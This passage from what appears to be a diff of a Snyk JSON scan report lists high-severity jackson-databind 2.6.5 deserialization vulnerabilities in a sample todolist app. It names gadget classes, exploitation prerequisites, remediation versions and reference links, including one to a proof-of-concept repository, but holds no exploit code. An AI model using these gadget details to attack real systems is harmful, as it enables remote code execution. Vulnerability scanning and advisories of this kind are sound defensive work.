io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-14061) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data 
Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-14439) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
`SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n# References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": 
"(CVE-2020-24616) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. 
However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-12022) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. 
an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-11307) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-12023) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": 
"(CVE-2018-14718) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-14720) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: 